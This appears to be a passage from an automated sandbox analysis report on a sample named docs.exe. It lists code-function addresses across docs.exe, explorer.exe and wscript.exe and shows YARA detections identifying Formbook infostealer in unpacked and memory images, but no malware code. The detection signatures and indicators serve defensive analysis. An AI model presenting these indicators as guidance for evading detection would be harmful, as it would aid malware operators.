          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041D89D
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041DA88
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041DBA8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00402D87
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00409E5B
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00409E60
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041DFD5
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041E792
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010041A2
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010101AA
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010081CC
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FD8158
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FEA118
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F40100
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FD02C0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100A352
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FF0274
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010103E6
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F5E3F0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FFE4F6
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_01010591
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FF4420
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_01002446
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F50535
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F6C6E0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F4C7C0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F50770
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F74750
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F7E8F0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F368B8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0101A9A6
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F52840
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F5A840
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F66962
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100AB40
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_01006BD7
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F40CF2
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FF0CB5
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F50C00
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F4ADE0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F68DBF
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FECD1F
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F5AD00
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F62E90
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F50E59
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F5CFE0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100EE26
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F42FC8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FCEFA0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100CE93
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FC4F40
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F70F30
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FF2F30
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F92F28
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100EEDB
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FFF0CC
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F570C0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0101B16B
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F5B1B0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F3F172
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F8516C
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100F0E0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010070E9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FF12ED
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100132D
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F6B2C0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F552A0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F9739A
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F3D34C
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_01007571
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F41460
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010195C3
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100F43F
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FED5B0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100F7B0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F95630
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_010016CC
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F538E0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FBD800
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F59950
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F6B950
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FE5910
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FFDAC6
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FEDAAC
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F95AA0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FF1AA3
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0100FB76
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FC3A6C
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F8DBF9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00FC5BF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01007A465_2_01007A46
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FA495_2_0100FA49
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6FB805_2_00F6FB80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01001D5A5_2_01001D5A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01007D735_2_01007D73
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC9C325_2_00FC9C32
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6FDC05_2_00F6FDC0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F53D405_2_00F53D40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FCF25_2_0100FCF2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FF095_2_0100FF09
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F59EB05_2_00F59EB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100FFB15_2_0100FFB1
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F13FD25_2_00F13FD2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F13FD55_2_00F13FD5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F51F925_2_00F51F92
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE942326_2_0FE94232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE975CD6_2_0FE975CD
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8EB306_2_0FE8EB30
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8EB326_2_0FE8EB32
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8BD026_2_0FE8BD02
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE919126_2_0FE91912
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE8A0826_2_0FE8A082
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE930366_2_0FE93036
          Source: C:\Windows\explorer.exeCode function: 6_2_1047A0366_2_1047A036
          Source: C:\Windows\explorer.exeCode function: 6_2_104710826_2_10471082
          Source: C:\Windows\explorer.exeCode function: 6_2_10472D026_2_10472D02
          Source: C:\Windows\explorer.exeCode function: 6_2_104789126_2_10478912
          Source: C:\Windows\explorer.exeCode function: 6_2_1047E5CD6_2_1047E5CD
          Source: C:\Windows\explorer.exeCode function: 6_2_1047B2326_2_1047B232
          Source: C:\Windows\explorer.exeCode function: 6_2_10475B326_2_10475B32
          Source: C:\Windows\explorer.exeCode function: 6_2_10475B306_2_10475B30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B4E4F68_2_04B4E4F6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B444208_2_04B44420
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B524468_2_04B52446
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B605918_2_04B60591
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA05358_2_04AA0535
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABC6E08_2_04ABC6E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9C7C08_2_04A9C7C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA07708_2_04AA0770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AC47508_2_04AC4750
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B320008_2_04B32000
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B541A28_2_04B541A2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B601AA8_2_04B601AA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B581CC8_2_04B581CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A901008_2_04A90100
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3A1188_2_04B3A118
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B281588_2_04B28158
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B202C08_2_04B202C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B402748_2_04B40274
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B603E68_2_04B603E6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAE3F08_2_04AAE3F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5A3528_2_04B5A352
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B40CB58_2_04B40CB5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A90CF28_2_04A90CF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA0C008_2_04AA0C00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AB8DBF8_2_04AB8DBF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9ADE08_2_04A9ADE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAAD008_2_04AAAD00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3CD1F8_2_04B3CD1F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5CE938_2_04B5CE93
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AB2E908_2_04AB2E90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5EEDB8_2_04B5EEDB
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5EE268_2_04B5EE26
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA0E598_2_04AA0E59
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B1EFA08_2_04B1EFA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AACFE08_2_04AACFE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A92FC88_2_04A92FC8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B42F308_2_04B42F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE2F288_2_04AE2F28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AC0F308_2_04AC0F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B14F408_2_04B14F40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A868B88_2_04A868B8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ACE8F08_2_04ACE8F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA28408_2_04AA2840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAA8408_2_04AAA840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA29A08_2_04AA29A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B6A9A68_2_04B6A9A6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AB69628_2_04AB6962
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A9EA808_2_04A9EA80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B56BD78_2_04B56BD7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5AB408_2_04B5AB40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5F43F8_2_04B5F43F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A914608_2_04A91460
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3D5B08_2_04B3D5B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B695C38_2_04B695C3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B575718_2_04B57571
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B516CC8_2_04B516CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE56308_2_04AE5630
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5F7B08_2_04B5F7B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5F0E08_2_04B5F0E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B570E98_2_04B570E9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA70C08_2_04AA70C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B4F0CC8_2_04B4F0CC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AAB1B08_2_04AAB1B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD516C8_2_04AD516C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A8F1728_2_04A8F172
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B6B16B8_2_04B6B16B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA52A08_2_04AA52A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B412ED8_2_04B412ED
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABB2C08_2_04ABB2C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE739A8_2_04AE739A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5132D8_2_04B5132D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A8D34C8_2_04A8D34C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FCF28_2_04B5FCF2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B19C328_2_04B19C32
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABFDC08_2_04ABFDC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B57D738_2_04B57D73
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA3D408_2_04AA3D40
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B51D5A8_2_04B51D5A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA9EB08_2_04AA9EB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FFB18_2_04B5FFB1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA1F928_2_04AA1F92
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A63FD58_2_04A63FD5
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04A63FD28_2_04A63FD2
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FF098_2_04B5FF09
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA38E08_2_04AA38E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B0D8008_2_04B0D800
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B359108_2_04B35910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AA99508_2_04AA9950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABB9508_2_04ABB950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AE5AA08_2_04AE5AA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B41AA38_2_04B41AA3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B3DAAC8_2_04B3DAAC
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B4DAC68_2_04B4DAC6
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B13A6C8_2_04B13A6C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B57A468_2_04B57A46
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FA498_2_04B5FA49
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ABFB808_2_04ABFB80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B15BF08_2_04B15BF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04ADDBF98_2_04ADDBF9
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04B5FB768_2_04B5FB76
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1E7928_2_02A1E792
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A09E608_2_02A09E60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A09E5B8_2_02A09E5B
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A02FB08_2_02A02FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A02D878_2_02A02D87
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A02D908_2_02A02D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AA0368_2_049AA036
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AE5CD8_2_049AE5CD
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A2D028_2_049A2D02
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A10828_2_049A1082
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A89128_2_049A8912
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AB2328_2_049AB232
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A5B328_2_049A5B32
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A5B308_2_049A5B30
          Source: C:\Users\user\Desktop\docs.exe | Code function: String function: 00F97E54 appears 111 times
          Source: C:\Users\user\Desktop\docs.exe | Code function: String function: 00FCF290 appears 105 times
          Source: C:\Users\user\Desktop\docs.exe | Code function: String function: 00F85130 appears 58 times
          Source: C:\Users\user\Desktop\docs.exe | Code function: String function: 00F3B970 appears 280 times
          Source: C:\Users\user\Desktop\docs.exe | Code function: String function: 00FBEA12 appears 86 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 04B1F290 appears 105 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 04AD5130 appears 58 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 04B0EA12 appears 86 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 04A8B970 appears 280 times
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: String function: 04AE7E54 appears 111 times
          Source: docs.exe | Static PE information: invalid certificate
          Source: docs.exe, 00000000.00000000.2127478025.0000000000B74000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamefdGd.exe, vs docs.exe
          Source: docs.exe, 00000000.00000002.2164405803.0000000007370000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs docs.exe
          Source: docs.exe, 00000000.00000002.2157251762.000000000101E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs docs.exe
          Source: docs.exe, 00000000.00000002.2160886912.0000000004A3D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs docs.exe
          Source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs docs.exe
          Source: docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs docs.exe
          Source: docs.exe, 00000005.00000002.2213742805.000000000103D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs docs.exe
          Source: docs.exe | Binary or memory string: OriginalFilenamefdGd.exe, vs docs.exe
          Source: docs.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
